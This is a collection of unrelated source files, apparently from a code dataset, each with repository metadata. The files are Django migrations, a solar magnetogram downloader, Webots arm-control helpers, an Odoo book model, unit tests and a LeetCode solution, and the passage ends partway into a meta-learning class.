345d3711ce3a62958820b876e58f7dff7835e2a4 | af9d9043a83a751f00f7b805533d87ccce330d21 | /Portfolio/Prophy Science/test_task/app/migrations/0002_keyphrase_exist.py | 197e667e522e8a81097b327d8155de69d7d95913 | [] | no_license | HeCToR74/Python | e664b79593a92daa7d39d402f789812dfc59c19f | f448ec0453818d55c5c9d30aaa4f19e1d7ca5867 | refs/heads/master | 2023-03-08T13:44:19.961694 | 2022-07-03T19:23:25 | 2022-07-03T19:23:25 | 182,556,680 | 1 | 1 | null | 2023-02-28T15:30:01 | 2019-04-21T16:26:48 | HTML | UTF-8 | Python | false | false | 425 | py | # Generated by Django 3.0.6 on 2021-01-24 11:54
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a boolean 'exist' flag to the 'keyphrase' model."""

    dependencies = [
        ('app', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='keyphrase',
            name='exist',
            # default=1 backfills existing rows as True
            field=models.BooleanField(default=1),
            # the default was only needed for the backfill, not kept on the field
            preserve_default=False,
        ),
    ]
| [
"noreply@github.com"
] | HeCToR74.noreply@github.com |
ee372759b920eeecc32a7ab4c1a17a49fdf1a5fc | ad65c833df24cf7aeacc1f9c953e3ef15701bda5 | /djangofour/first_app/migrations/0001_initial.py | b7aa5975474c0e7bb65bbfa83f90b8244fd9320d | [] | no_license | 098anu098/django-deployment | cb3d15edd90d34a8976a33905f2bdef2b751194a | 2640cec0edd8b7a39febceb2c9479ac5ef9da319 | refs/heads/master | 2022-09-23T10:29:19.251290 | 2020-06-05T08:42:53 | 2020-06-05T08:42:53 | 269,566,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | # Generated by Django 3.0.6 on 2020-06-04 16:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: create the UserInfo model (one-to-one with the user model)."""

    initial = True
    dependencies = [
        # depend on whichever user model the project has configured
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='UserInfo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('portfolio', models.URLField()),
                ('picture', models.ImageField(upload_to='')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"098anu098@gmail.com"
] | 098anu098@gmail.com |
ba011fc53d95bdff7c0a68055d7286baae096113 | 16db9aee91f511ee18736177befeaf32488a06cb | /randomNumber_backup_to_start_task14.py | 2a99c5b530b7fcab2f399657fa1ad204195b7ee0 | [] | no_license | AdotHahn/Course | 9324c35982f5fbcd6d10acd18db518672a29cfd4 | 01b32e12ae0dff6b38c17869ec4fbddad7384770 | refs/heads/master | 2020-05-31T07:19:09.484835 | 2019-06-04T08:42:21 | 2019-06-04T08:42:21 | 190,162,838 | 0 | 0 | null | 2019-06-04T08:41:13 | 2019-06-04T08:41:13 | null | UTF-8 | Python | false | false | 1,273 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# team: teammember 1, teammember 2, teammember 3
# expert of exercise block 1: teammember 1
# temptest
# what is happening to me?
import random
import time
import sys
from matplotlib import pyplot as plt
def get_random_number_with_randint(start, end):
    """Return a pseudo-random integer N with start <= N <= end."""
    return random.randint(start, end)
def write_log_file(outputfilename, data):
    """Append one timestamped line recording *data* to <outputfilename>.log.

    The line format is:
    "Our randomly generated number is <data> (HH:MM:SS)"
    """
    # context manager guarantees the handle is closed even if the write
    # fails (the original leaked the handle on error)
    with open(outputfilename + ".log", "a") as f:
        f.write("Our randomly generated number is " + str(data) + " (" + time.strftime("%H:%M:%S") + ")\n")
def get_color_by_dice_roll(spots):
    """Map a die roll (1..6) onto its display colour name."""
    palette = ("blue", "green", "red", "yellow", "purple", "orange")
    return palette[spots - 1]
def get_color_by_dice_naive(spots):
    """Naive variant: look up the colour name for a die roll of 1..6."""
    colour_names = "blue green red yellow purple orange".split()
    return colour_names[spots - 1]
if __name__ == "__main__":
    outputfilename = "randomNumber"
    rolls_new = []
    # roll a die six times, logging each roll's colour as it happens
    for i in range(6):
        roll = get_random_number_with_randint(1, 6)
        rolls_new.append(roll)
        print(rolls_new)
        sys.stdout.flush()
        color = get_color_by_dice_roll(roll)
        print("Last colour would be {}".format(color))
        # NOTE(review): the log line says "number is <...>" but the colour
        # name is passed, not the roll — confirm which was intended.
        write_log_file(outputfilename, color)
    # horizontal bar chart of the six rolls, then wait for the user
    plt.barh(range(6), rolls_new)
    plt.show()
    input("enter to close")
| [
"baltasar.ruechardt@ds.mpg.de"
] | baltasar.ruechardt@ds.mpg.de |
cb1b755acd76f9db92cf7cb4a054a194126f2c56 | 2cf87feeebfe128d6c60067e82e5b28b3a84ae45 | /aracle/data/make3dslices.py | a5b16c308b96da0c083019c4adf28e64496bd654 | [
"MIT"
] | permissive | jiwoncpark/aracle | b536fbea39480b7af96daff1a9c51d2a7f131866 | 20aabe27ce65b738b77192242dc89eda612f945e | refs/heads/master | 2020-06-03T15:21:35.386628 | 2019-11-12T17:49:34 | 2019-11-12T17:49:34 | 191,626,657 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,320 | py | import drms #pip install drms, astropy, sunpy , skvideo
import numpy as np
import astropy.units as u
import shutil
import os
import datetime
import matplotlib.pyplot as plt
import skvideo.io
from astropy.io import fits
from matplotlib.pyplot import imshow
from PIL import Image
from sunpy.map import Map
from datetime import date, time, datetime, timedelta
# Working directories for the raw FITS downloads.
workdir = 'C:/Users/alexf/Desktop/HMI_Data/'
fits_dir = workdir + 'fits/'
if not os.path.exists(workdir):
    os.mkdir(workdir)
    print("Directory " + workdir + "does not exist. Creating...")
# Download window and cadence for the HMI magnetogram series.
start = datetime(2010,5,1,1,0,0)#date time object format is year, month, day, hour, minute, second
end = datetime(2018,5,1,0,0,0)
time_interval = timedelta(minutes = 60) #timedelta will accept weeks,days,hours,minutes and seconds as input
chunk_size = 480 #chunk size is the number of hmi files downloaded in each export call. must be at least 1
export_protocol = 'fits'#using as-is instead of fits will result in important metadata not being downloaded
email = 'hsmgroupnasa@gmail.com'#use a group email
series = 'hmi.M_720s'
# Sanity check only: the message is printed but the run continues (exit disabled).
if (end < start):
    print("The end date is before the start date. Please select an end date after the start date")
    #sys.exit()
if not os.path.exists(fits_dir):
    os.mkdir(fits_dir)
    print("Directory " + fits_dir + "does not exist. Creating...")
# JSOC export client and overall progress bookkeeping.
c = drms.Client(email=email, verbose = True)
total = (end-start) // time_interval + 1
print('Downloading ' + str(total) + ' files')
missing_files = []
def download(start,end,chunk_size,time_interval):
    """
    Download the series in chunks of up to `chunk_size` records.

    On an export failure the chunk is retried recursively with half the
    chunk size (bisection) until single records are reached; records that
    still fail are recorded in the module-level `missing_files` list.
    """
    current_time = start
    while(current_time<end):
        # clamp the last chunk to the remaining time span
        if (end-current_time > (time_interval * chunk_size)):
            time_chunk = (time_interval * chunk_size)
        else:
            time_chunk = end-current_time
        end_time = current_time + time_chunk
        # JSOC query timestamps in 'YYYY.MM.DD_HH:MM:SS_UT' form
        current_timestring = current_time.strftime('%Y' + '.' + '%m' + '.'+'%d'+'_'+'%X') + '_UT'
        end_timestring = end_time.strftime('%Y' + '.' + '%m' + '.'+'%d'+'_'+'%X') + '_UT'
        query = series + '[' + current_timestring + '-' + end_timestring + '@' + str(time_interval.total_seconds()) + 's]'
        print('Query string: ' + query)
        try:
            r = c.export(query, protocol = export_protocol)
            r.download(fits_dir)
            exists = os.path.isfile(fits_dir + '.1')
            if exists:#if a fits file no longer exists, it will be downloaded as an empty .1 file. this deletes .1 files
                os.remove(fits_dir + '.1')
                raise ValueError('Fits file no longer exists. Deleting downloaded file...')
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
        # narrowing it would change retry behaviour, so it is left as-is.
        except:#if files are missing from the server, the export call fails. this keeps track of missing files
            if (chunk_size == 1):
                missing_files.append(current_timestring)
            else:
                # bisect the failing chunk and retry both halves
                download(current_time,end_time,chunk_size//2,time_interval)
        current_time = end_time
print(missing_files)
#delete all duplicate files
test = os.listdir(fits_dir)
for item in test:
if item.endswith(".1"):
os.remove(os.path.join(fits_dir, item))
Xdata_dir = workdir + 'Xdata/'
if not os.path.exists(Xdata_dir):
os.mkdir(Xdata_dir)
print("Directory " + Xdata_dir + "does not exist. Creating...")
fits_filenames = os.listdir(fits_dir)
resizing = [256]
for resize in resizing:
resize_dir = Xdata_dir + str(resize)
if os.path.exists(resize_dir):#delete any resizing directories matching the new resizes
shutil.rmtree(resize_dir)
os.makedirs(resize_dir)#creates new resize directories
for filename in fits_filenames: #iterates over fits files and converts to a numpy array
hmi_map = Map(fits_dir + filename)
rotateddata90 = hmi_map.rotate(angle=90*u.deg, order = 0)
rotateddata180 = rotateddata90.rotate(angle=90*u.deg, order = 0)
data = rotateddata180.data
data[np.where(np.isnan(data))] = 0.0 # replacing nans with 0s
print('saving '+filename +' in sizes'+ str(resizing))
for resize in resizing:#resizes and saves numpy array data into given resizes
resized_image = np.array(Image.fromarray(data).resize((resize,resize),Image.LANCZOS))
np.save(Xdata_dir + str(resize) + '/' + filename[:26] + '_'+ str(resize), resized_image)#saves series,time,and resize | [
"jiwon.christine.park@gmail.com"
] | jiwon.christine.park@gmail.com |
97176f4b2cf2a2706ba0989eee781b449a4cf6b0 | 14cdc1353affd01ec9f96c31cd51549d82364b2c | /test/IECore/OptionsTest.py | f257f594de42cc75781eb2db60bfa267e5f96a44 | [] | no_license | dsparrow27/cortex | f787cdcc271388986cd24ee27b48999ae71ef194 | 5e985efa860aec22a0c8ec6cebf9e682f65eca73 | refs/heads/master | 2021-08-19T06:30:36.881268 | 2017-11-23T08:26:13 | 2017-11-23T08:26:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,627 | py | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
class OptionsTest( unittest.TestCase ) :

    """Unit tests for the IECore.Options container."""

    def testCopy( self ) :
        # A copy must compare equal to the options it was copied from.
        original = IECore.Options()
        original.options["test"] = IECore.FloatData( 10 )
        duplicate = original.copy()
        self.assertEqual( original, duplicate )

    def testConstructFromDict( self ) :
        # Constructing from a dict must preserve every entry verbatim.
        options = IECore.Options( {
            "a" : IECore.StringData( "a" ),
            "b" : IECore.IntData( 10 ),
        } )
        self.assertEqual( len( options.options ), 2 )
        self.assertEqual( options.options["a"], IECore.StringData( "a" ) )
        self.assertEqual( options.options["b"], IECore.IntData( 10 ) )

    def testHash( self ) :
        # Hashes agree exactly when the stored options agree.
        first = IECore.Options()
        second = IECore.Options()
        self.assertEqual( first.hash(), second.hash() )
        first.options["a"] = IECore.StringData( "a" )
        self.assertNotEqual( first.hash(), second.hash() )
        second.options["a"] = IECore.StringData( "a" )
        self.assertEqual( first.hash(), second.hash() )
# Run the tests when this file is executed directly.
if __name__ == "__main__":
    unittest.main()
| [
"thehaddonyoof@gmail.com"
] | thehaddonyoof@gmail.com |
583da391bcd6fac86e125c68704ba1188b5c76af | 25112659fe41d94b5c046f0a17d6508a218f920a | /controllers/practica_3_1/funciones_manipulador.py | d4b3e89f271fce08031a8e993cd559860a723052 | [] | no_license | lfrecalde1/KUKA_YOU_BOT_MANIPULADOR | c5e36bf2750484a2726cad707bd90f9b1eecdf9f | 5200b80c3c1fbdf5a760b1ac6fe378b5767fadac | refs/heads/main | 2023-01-11T12:40:36.195768 | 2020-11-24T03:43:31 | 2020-11-24T03:43:31 | 315,459,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,866 | py | import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
def grafica(sty, titulo, x, y, z, etiqueta, ejex, ejey, ejez, color):
    """Draw one labelled 3D curve with the given matplotlib style and block
    until the plot window is closed."""
    mpl.style.use(sty)
    axes = plt.axes(projection="3d")
    axes.set_title(titulo.format(sty), color='0')
    axes.set_xlabel(ejex)
    axes.set_ylabel(ejey)
    axes.set_zlabel(ejez)
    axes.plot3D(x, y, z, color, label=etiqueta)
    axes.grid(linestyle='--', linewidth='0.3', color='black')
    axes.legend(loc='upper right', shadow=False, fontsize='small')
    plt.show()
def grafica_c(sty, titulo, x, y, z, etiqueta, ejex, ejey, ejez, color,
              x_1, y_1, z_1, etiqueta_1, color_1):
    """Draw two labelled 3D curves on the same axes (e.g. desired vs actual
    trajectory) and block until the plot window is closed."""
    mpl.style.use(sty)
    axes = plt.axes(projection="3d")
    axes.set_title(titulo.format(sty), color='0')
    axes.set_xlabel(ejex)
    axes.set_ylabel(ejey)
    axes.set_zlabel(ejez)
    axes.plot3D(x, y, z, color, label=etiqueta)
    axes.plot3D(x_1, y_1, z_1, color_1, label=etiqueta_1)
    axes.grid(linestyle='--', linewidth='0.2', color='black')
    axes.legend(loc='upper right', shadow=False, fontsize='small')
    plt.show()
def home(arm_elements,tiempo_home,robot):
    """Drive the five arm joints to the predefined home pose.

    arm_elements: the five joint motor devices; tiempo_home: time budget in
    seconds; robot: Webots robot instance advancing the simulation clock.
    """
    # Build the control time vector: one entry per 0.1 s control tick.
    t_sample=0.1
    t_final=tiempo_home+t_sample
    t=np.arange(0,t_final,t_sample)
    t=t.reshape(1,t.shape[0])
    # NOTE(review): 95 ms step, but the original note said
    # "100 milliseconds equals 0.1 seconds" — confirm the mismatch is intended.
    timestep = int(95)# 100 milliseconds equals 0.1 seconds
    for k in range(0,t.shape[1]):
        if robot.step(timestep) != -1:
            # Send the velocity for each joint.
            arm_elements[0].setVelocity(0.5)
            arm_elements[1].setVelocity(0.5)
            arm_elements[2].setVelocity(0.5)
            arm_elements[3].setVelocity(0.5)
            arm_elements[4].setVelocity(0.5)
            # Send the position setpoint for each joint (the home pose).
            arm_elements[0].setPosition(0)
            arm_elements[1].setPosition(float(-np.pi/4))
            arm_elements[2].setPosition(float(-np.pi/4))
            arm_elements[3].setPosition(float(-np.pi/8))
            arm_elements[4].setPosition(float(0))
            # NOTE(review): printed every control tick in this layout —
            # confirm it was not meant to print once after the loop.
            print("SYSTEM HOME")
def controlador(h,hd,hdp,q,qd,l0,l1,a1,l2,l3,l4,k1,k2,k3,k4):
    """Redundancy-resolving inverse-kinematics controller for the 5-DOF arm.

    h / hd / hdp: current position, desired position and desired velocity of
    the end effector (3x1 arrays); q / qd: current and desired joint vectors
    (5x1; qd is the secondary, null-space objective); l0..l4, a1: link
    geometry; k1..k4: controller gains.  Returns the five joint-velocity
    commands.
    """
    # Gain matrices: K1/K2 shape the task-space error response, K3/K4 the
    # null-space (joint posture) response; W weights the pseudo-inverse.
    K1=k1*np.eye(3,3)
    K2=k2*np.eye(3,3)
    K3=k3*np.eye(5,5)
    K4=k4*np.eye(5,5)
    W=np.eye(5,5)
    W_1=np.linalg.inv(W)
    # Task-space error and joint-space (null-space) error.
    herr=hd-h
    nulo=qd-q
    I=np.eye(5,5)
    # Analytic Jacobian of the end-effector position w.r.t. the five joints
    # (rows x, y, z; columns joints 1..5; joint 5 does not move the tip).
    J11=np.sin(q[0,0])*(l2*np.sin(q[1,0])+l3*np.sin(q[1,0]+q[2,0])+l4*np.sin(q[1,0]+q[2,0]+q[3,0])-a1)
    J12=-np.cos(q[0,0])*(l2*np.cos(q[1,0])+l3*np.cos(q[1,0]+q[2,0])+l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
    J13=-np.cos(q[0,0])*(l3*np.cos(q[1,0]+q[2,0])+l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
    J14=-np.cos(q[0,0])*(l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
    J15=0
    J21=-np.cos(q[0,0])*(l2*np.sin(q[1,0])+l3*np.sin(q[1,0]+q[2,0])+l4*np.sin(q[1,0]+q[2,0]+q[3,0])-a1)
    J22=-np.sin(q[0,0])*(l2*np.cos(q[1,0])+l3*np.cos(q[1,0]+q[2,0])+l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
    J23=-np.sin(q[0,0])*(l3*np.cos(q[1,0]+q[2,0])+l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
    J24=-np.sin(q[0,0])*(l4*np.cos(q[1,0]+q[2,0]+q[3,0]))
    J25=0
    J31=0
    J32=-(l2*np.sin(q[1,0])+l3*np.sin(q[1,0]+q[2,0])+l4*np.sin(q[1,0]+q[2,0]+q[3,0]))
    J33=-(l3*np.sin(q[1,0]+q[2,0])+l4*np.sin(q[1,0]+q[2,0]+q[3,0]))
    J34=-(l4*np.sin(q[1,0]+q[2,0]+q[3,0]))
    J35=0
    J=np.matrix([[J11,J12,J13,J14,J15],[J21,J22,J23,J24,J25],[J31,J32,J33,J34,J35]])
    # Weighted right pseudo-inverse of J.
    J_m=W_1@J.transpose()@np.linalg.inv(J@W_1@J.transpose())
    # Primary task with tanh-saturated error feedback, plus the null-space
    # projection (I - J_m J) of the joint-posture objective.
    control=J_m@(hdp+K2@np.tanh(np.linalg.inv(K2)@K1@herr))+(I-J_m@J)@K3@np.tanh(np.linalg.inv(K3)@K4@nulo)
    return control[0,0], control[1,0], control[2,0], control[3,0], control[4,0]
return control[0,0], control[1,0], control[2,0], control[3,0], control[4,0]
def euler(z, zp, t_sample):
    """Advance state *z* one explicit-Euler step of size *t_sample* using the
    derivative *zp*."""
    return z + zp * t_sample
def tranformacion_cordenadas(x, y, z, phi):
    """Rotate the body-frame point (x, y, z) by yaw angle *phi* (about the
    z axis) into the world frame; returns the three world coordinates."""
    rotacion = np.matrix([[np.cos(phi), -np.sin(phi), 0],
                          [np.sin(phi), np.cos(phi), 0],
                          [0, 0, 1]])
    punto = np.array([[x], [y], [z]])
    mundo = rotacion @ punto
    return mundo[0, 0], mundo[1, 0], mundo[2, 0]
"lfrecalde1@espe.edu.ec"
] | lfrecalde1@espe.edu.ec |
d5604b226c72488919b888f5ef1f7ef51ab130b7 | 1631ca8e5cc7fa7e7d2ac307fefab490bb307ab7 | /function_filePathCheck.py | dad0375d21938bb07060cf5ca7394f61692c2190 | [] | no_license | jacksalssome/StandardFormatTranscoder | 5350d7ba1edf05f58299619d350df6fa53946008 | 29e6a38f0326301743c99b0cb65a0872e1fc7984 | refs/heads/main | 2023-07-16T01:56:26.790527 | 2023-07-08T15:28:49 | 2023-07-08T15:28:49 | 321,584,824 | 14 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,267 | py | from colorama import Fore
import sys
import re
import os
def filePathCheck(currentOS, inputArg):
    """Explain why *inputArg* is not a usable directory, then exit.

    Called after path validation has already failed; each branch only picks
    the most helpful message for the platform/path shape.
    """
    if currentOS == "Windows" and len(inputArg) <= 3: # <= 3 equals C:\ (root dir)
        print(Fore.YELLOW + "Can't run in root of drive, input has to be like: " + Fore.RESET + "-i \"D:\\folder\"")
    # Two-letter drive roots like "AB:\" (length <= 4).
    elif currentOS == "Windows" and len(inputArg) <= 4 and re.search("[A-Z][A-Z]:\\\\", str(inputArg)): # <= 4 equals AB:\ (root dir)
        print(Fore.YELLOW + "Nice drive letters, but can't run in root of drive, input has to be like: " + Fore.RESET + "-i \"D:\\folder\"")
    elif currentOS == "Linux" and len(inputArg) <= 1: # <= 2 equals / (root dir)
        print(Fore.YELLOW + "Can't run in root of drive, input has to be like: " + Fore.RESET + "-i \"/home\"")
    else:
        print(Fore.YELLOW + "Can't find file path: \"" + Fore.RESET + inputArg + Fore.YELLOW + "\"" + Fore.RESET)
        print(Fore.YELLOW + "Note: this program doesn't create directories" + Fore.RESET)
    # Always pause so the user can read the message, then terminate.
    input("Press Enter to exit...")
    sys.exit()
def checkIfPathIsAFile(Directory, typeOfDirectory):
    """If *Directory* points at a file, offer to use its parent directory.

    typeOfDirectory is "input" or "output" and only changes the prompt text.
    Returns the (possibly trimmed) directory; exits the program if the user
    declines.
    """
    if os.path.isfile(Directory): # If user puts in a link to a single file
        if typeOfDirectory == "input":
            print(Fore.YELLOW + "Cant handle direct files, only the directory they are in." + Fore.RESET)
            print(Fore.YELLOW + "Would you like to use this directory: " + Fore.RESET + "\"" + os.path.dirname(Directory) + "\"" + Fore.YELLOW + "? [Y/N]" + Fore.RESET)
        elif typeOfDirectory == "output":
            print(Fore.YELLOW + "Output to a single file, only to a directory." + Fore.RESET)
            print(Fore.YELLOW + "Would you like to output to this directory: " + Fore.RESET + "\"" + os.path.dirname(Directory) + "\"" + Fore.YELLOW + "? [Y/N]" + Fore.RESET)
        else:
            # Bug fix: the original left a debugger breakpoint() here; a bad
            # typeOfDirectory is a programming error, so fail loudly instead.
            raise ValueError("unknown typeOfDirectory: %r" % (typeOfDirectory,))
        answerYN = None
        # Keep prompting until the user gives a recognisable yes/no answer.
        while answerYN not in ("yes", "no", "y", "n"):
            answerYN = input()
            if answerYN == "yes" or answerYN == "y":
                Directory = os.path.dirname(Directory) # Trim input dir to the dir of the inputted file
            elif answerYN == "no" or answerYN == "n":
                sys.exit()
            else:
                print("Please enter yes or no.")
    return Directory
| [
"jacksalssome@hotmail.com"
] | jacksalssome@hotmail.com |
1aa86a3850c8d370b0a3bfe7231bb14804fde80b | 248e87db5d7819962ca9b68afcb5b33cb68d219f | /apps/login_regis/migrations/0001_initial.py | 6337eb3cbf6404875506ae744b04e8388079e209 | [] | no_license | Acyu83/pythonblackbelt2 | c4b2ca571a516a3aec3178d2970582b8071390e6 | 0e1732d099327af4bf23abaaaf5304a458a833ba | refs/heads/master | 2021-01-17T11:10:10.999793 | 2017-03-06T03:56:41 | 2017-03-06T03:56:41 | 84,026,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 887 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-22 21:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema migration: creates the login_regis User table."""
    # Auto-generated by Django (see file header); avoid hand-editing a
    # migration once it has been applied anywhere.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=255)),
                ('last_name', models.CharField(max_length=255)),
                ('email', models.CharField(max_length=255)),
                ('password', models.CharField(max_length=255)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
| [
"acyu83@gmail.com"
] | acyu83@gmail.com |
49716fffe1d3d747365e83abe99f48f2a62222a2 | be5c86e8fe3f5836b7d2097dd5272c72b5b28f15 | /binary-search/Python/0374-guess-number-higher-or-lower.py | bca7b49cffd223314f15f7da64b8be501150cf07 | [
"Apache-2.0"
] | permissive | lemonnader/LeetCode-Solution-Well-Formed | d24674898ceb5441c036016dc30afc58e4a1247a | baabdb1990fd49ab82a712e121f49c4f68b29459 | refs/heads/master | 2021-04-23T18:49:40.337569 | 2020-03-24T04:50:27 | 2020-03-24T04:50:27 | 249,972,064 | 1 | 0 | Apache-2.0 | 2020-03-25T12:26:25 | 2020-03-25T12:26:24 | null | UTF-8 | Python | false | false | 523 | py | # The guess API is already defined for you.
# @param num, your guess
# @return -1 if my number is lower, 1 if my number is higher, otherwise return 0
# Placeholder for the judge-provided guess API; the real implementation is
# injected by the LeetCode runtime.
def guess(num):
    pass
class Solution(object):
    """LeetCode 374: find the picked number via the guess() oracle."""

    def guessNumber(self, n):
        """Binary-search [1, n]; guess(mid) == 1 means the answer is higher."""
        lo, hi = 1, n
        while lo < hi:
            mid = lo + (hi - lo) // 2
            if guess(mid) == 1:
                lo = mid + 1
            else:
                hi = mid
        # The loop invariant leaves exactly one candidate, which must be the
        # picked number, so no post-processing is needed.
        return lo
| [
"121088825@qq.com"
] | 121088825@qq.com |
1095576a2812ddaaae40317c51f9a41d639a7ada | bbb68a670f242fe80f321d85701a917e670847d5 | /library_app/models/library_book.py | 84057c5674df74b47245046868fb8d182892b985 | [] | no_license | Aaron-97/test | 7f3606f6fe51797d1d8329ff790e9cd47f512a65 | c7bcfab9280fbc760499cb94acf56f75f14d00b9 | refs/heads/master | 2023-01-09T23:40:07.239037 | 2020-11-09T08:03:59 | 2020-11-09T08:03:59 | 311,197,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,240 | py | from odoo import api, fields, models
from odoo.exceptions import Warning, ValidationError
class Book(models.Model):
    """Library book record (Odoo model ``library.book``)."""
    _name = 'library.book'
    _description = 'Book'
    # String fields
    name = fields.Char('Title', required=True)
    isbn = fields.Char('ISBN')
    book_type = fields.Selection(
        [('paper', 'Paperback'),
         ('hard', 'Hardcover'),
         ('electronic', 'Electronic'),
         ('other', 'Other')],
        'Type')
    notes = fields.Text('Internal Notes')
    descr = fields.Html('Description')
    # Numeric fields:
    copies = fields.Integer(default=1)
    # NOTE(review): second positional argument is presumably the `digits`
    # precision (3, 2) — confirm against the Odoo version in use.
    avg_rating = fields.Float('Average Rating', (3,2))
    price = fields.Monetary('Price', 'currency_id')
    currency_id = fields.Many2one('res.currency')
    # Date and time fields
    date_published = fields.Date()
    last_borrow_date = fields.Datetime(
        'Last Borrowed On',
        default=lambda self: fields.Datetime.now())
    # Other fields
    active = fields.Boolean('Active?', default=True)
    image = fields.Binary('Cover')
    publisher_id = fields.Many2one('res.partner', string='Publisher')
    author_ids = fields.Many2many('res.partner', string='Authors')

    def _check_isbn(self):
        """Validate self.isbn as a 13-digit (EAN-13) ISBN.

        Returns True/False for 13-digit codes and None (falsy) for any other
        length, so e.g. ISBN-10 codes are treated as invalid.
        """
        self.ensure_one()
        isbn = self.isbn.replace('-', '')
        digits = [int(x) for x in isbn if x.isdigit()]
        if len(digits) == 13:
            # EAN-13 checksum: alternating weights 1,3 over the first
            # 12 digits; the 13th digit must equal the check value.
            ponderations = [1, 3] * 6
            terms = [a * b for a, b in zip(digits[:13], ponderations)]
            remain = sum(terms) % 10
            check = 10 - remain if remain != 0 else 0
            return digits[-1] == check

    def button_check_isbn(self):
        """Form-button handler: warn about a missing or invalid ISBN."""
        for book in self:
            if not book.isbn:
                raise Warning('Please provide an ISBN for %s' % book.name)
            if book.isbn and not book._check_isbn():
                raise Warning('%s is an invalid ISBN' % book.isbn)
        return True

    # Publisher's country exposed as a computed field with inverse and
    # search handlers so it can be written and filtered like a stored field.
    publisher_country_id = fields.Many2one(
        'res.country', string='Publisher Country',
        compute='_compute_publisher_country',
        # store = False, # not stored in the database by default
        inverse='_inverse_publisher_country',
        search='_search_publisher_country',
    )

    @api.depends('publisher_id.country_id')
    def _compute_publisher_country(self):
        for book in self:
            book.publisher_country_id = book.publisher_id.country_id

    def _inverse_publisher_country(self):
        # Writing the related country pushes it back onto the publisher.
        for book in self:
            book.publisher_id.country_id = book.publisher_country_id

    def _search_publisher_country(self, operator, value):
        return [('publisher_id.country_id', operator, value)]

    _sql_constraints = [
        ('library_book_name_date_uq', # constraint unique identifier
         'UNIQUE (name, date_published)', # constraint SQL syntax
         'Book title and publication date must be unique'), # message
        ('library_book_check_date',
         'CHECK (date_published <= current_date)',
         'Publication date must not be in the future'),
    ]

    @api.constrains('isbn')
    def _constrain_isbn_valid(self):
        """ORM-level guard: reject saves that carry an invalid ISBN."""
        for book in self:
            if book.isbn and not book._check_isbn():
                raise ValidationError('%s is an invalid ISBN' % book.isbn)
| [
"2291177920@qq.com"
] | 2291177920@qq.com |
a8e39f0d7e65c4e87997c24e78265589babf0581 | 97841ea896bad4098350243e35580e8fe968d220 | /src/maml.py | 6007461a4f3e693525956861b8287af22655668f | [
"MIT"
] | permissive | gthecht/mandril-project | f5863ac5caee4789b439b4b20f3f288d780df3ba | b1232706d8b77210ec3ed2fee4d809f2faacdd3e | refs/heads/main | 2023-03-19T05:24:49.345063 | 2021-02-28T18:26:52 | 2021-02-28T18:26:52 | 313,941,452 | 0 | 0 | MIT | 2020-12-09T14:48:51 | 2020-11-18T13:21:42 | null | UTF-8 | Python | false | false | 9,297 | py | #!/usr/bin/env python
import utils
import solver as Solver
import gridworld as World
import gaussianfit as Gfit
import numpy as np
import matplotlib.pyplot as plt
import time
class Mandril:
    """MAML-style meta-learner for maximum-entropy IRL on random gridworlds.

    Each iteration samples a fresh gridworld task, fits MaxEnt IRL both from
